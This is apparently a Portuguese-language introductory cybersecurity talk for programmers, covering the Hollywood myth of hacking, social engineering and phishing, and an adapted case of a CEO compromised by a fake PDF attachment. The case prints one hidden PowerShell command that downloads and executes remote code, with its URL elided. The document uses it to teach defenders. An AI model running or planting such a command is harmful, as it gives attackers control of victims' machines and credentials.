# Cybersegurança na prática: onde realmente os sistemas quebram ## Parte 0: Olá Olá, meu nome é Álvaro, conhecido pelos apelidos **Russo Incendiário** ![](../Pasted%20image%2020260222135117.png) Gosto muito de ciência, tecnologia e pirotecnia. # Parte 1 — Quebrando o mito > *beep boop* — "We're in." Essa é a imagem que a gente tem de cybersegurança. Tela preta. Código verde. Um cara de hoodie digitando freneticamente. Três telas. Uma animação 3D do planeta Terra sendo invadido. Isso é Hollywood. Cybersegurança não é isso. Hackers não “adivinham senha”. Não é força bruta cinematográfica. Não é mágica. Não é genialidade sobre-humana. É engenharia. É entender como um sistema funciona — melhor do que quem construiu. --- Se você tem um cadeado que precisa ser aberto, você não precisa da chave. Você precisa entender como o cadeado funciona. Como os pinos se alinham. Como a mola responde. Onde está a tensão. Um chaveiro sabe abrir um cadeado sem a chave. Não porque ele é mágico. Mas porque ele entende o mecanismo. Ser hacker é isso. --- ### Exercício mental Eu quero invadir sua casa. Quem eu chamo? 1. Um ladrão profissional. 2. Ou o chaveiro da esquina? O ladrão talvez quebre a porta. Faça barulho. Chame atenção. O chaveiro? Ele abre. Sem quebrar nada. Sem alarme. Sem ninguém perceber. Hackear é ser o chaveiro. Não é destruir o sistema. É manipulá-lo. --- E aqui está o ponto importante: A maioria dos sistemas não é invadida porque alguém foi brilhante. É invadida porque alguém deixou um parafuso solto. Cybersegurança não é sobre impedir o impossível. É sobre revisar cada engrenagem antes que alguém curioso resolva entender como ela funciona. # Parte 2 — O Maior Vetor de Ataque Não É Técnico > “É mais fácil convencer alguém a abrir a porta do que arrombar a porta.” Se você quer proteger um sistema, precisa aceitar uma coisa desconfortável: Humanos são parte do sistema. E humanos são previsíveis. Coloque isso na sua cabeça: - Usuários são superfície de ataque. - Confiança é explorável. - Pressa é explorável. - Autoridade é explorável. - Curiosidade é explorável. - Medo é explorável. Phishing funciona não porque as pessoas são burras. Mas porque ele parece legítimo. Ele imita: - Linguagem - Layout - Urgência - Contexto Ele explora algo que já existe: confiança. --- ### Exercício mental O que é mais fácil fazer para conseguir seus dados bancários? 1. Hackear a infraestrutura do Nubank? Invadir datacenter. Quebrar criptografia. Burlar monitoramento. Fugir de auditoria. Não deixar log. Ou... 2. Criar um site dizendo: “Descubra qual jogador do Real Madrid você seria” e pedir seus dados para “confirmar identidade”? Qual dos dois exige mais engenharia? Qual dos dois dá menos trabalho? Qual dos dois é menos arriscado? Silêncio estratégico aqui. --- A maioria dos ataques não acontece porque alguém invadiu o banco. Acontece porque alguém clicou. Porque alguém confiou. Porque alguém estava com pressa. Porque parecia normal. --- E aqui está a parte importante para vocês como programadores: Quando você constrói um sistema, você não está protegendo só código. Você está protegendo pessoas. E pessoas: - reutilizam senha, - clicam sem ler, - ignoram alerta, - acreditam em urgência. O atacante sabe disso. Ele não começa pelo firewall. Ele começa pelo comportamento. --- Segurança não começa na criptografia. Começa na cultura. --- ## Parte 3: Conheça seu alvo Pergunte para qualquer estrategista como vencer uma batalha. Sua provavelmente resposta será > "Conheça seu inimigo" ### Exemplo de caso real ## Caso real (adaptado) Uberlândia, 14h37. O CEO de uma empresa local está no escritório. Reuniões pela manhã. Planilhas abertas. WhatsApp Web piscando. Ar-condicionado fraco — ele comenta com alguém da equipe. No meio disso, ele confere os e-mails. Assunto: "Nota Fiscal – Fornecedor Atlas Comercial LTDA" Nada estranho. A empresa realmente tem fornecedores. O layout do e-mail parece normal. Assinatura, CNPJ, telefone. Tudo plausível. Ele abre. Anexo: nf-210230120310240102.zip Ele extrai. Dentro: nf-210230120310240102.pdf Ícone de PDF. Nome de PDF. Extensão de PDF. Ele dá dois cliques. Por menos de um segundo, uma janela preta pisca na tela. Ele nem percebe. Acredita que o arquivo corrompeu. Fecha. Volta para o trabalho. O que ele não viu: O arquivo não era um PDF. Era um atalho disfarçado. Um pequeno script. Algo equivalente a: powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest ... | Invoke-Expression" Em português simples: “Baixe código da internet. Execute. Não mostre nada.” Em menos de 3 segundos: - Um agente é instalado. - A máquina estabelece conexão reversa. - Um servidor externo agora pode enviar comandos. - A sessão está ativa. Não houve: - Exploit sofisticado. - Zero-day. - Quebra de criptografia. - Força bruta. Só um clique. Nos dias seguintes: - Credenciais salvas no navegador são extraídas. - Tokens de sessão são copiados. - Acesso ao sistema interno é mapeado. - Pastas compartilhadas são indexadas. - E-mails são lidos. - Dados de clientes são copiados silenciosamente. Nada trava. Nada quebra. Nada avisa. Sem ransomware. Sem tela vermelha. Sem pedido de resgate. Só coleta. Meses depois, a empresa descobre que seus dados estão sendo usados para aplicar golpes em seus próprios clientes. A pergunta não é: “Como invadiram?” A pergunta é: Onde estava o parafuso solto? ## Parte 4: Vulnerabilidades do Mundo Real ### Caso 1: Sistema de Controle de Acesso vazando senhas de rede. - SQL Injection em simulador - PostgreSQL exposto sem autenticação - Redis aberto (pode mencionar como exemplo clássico)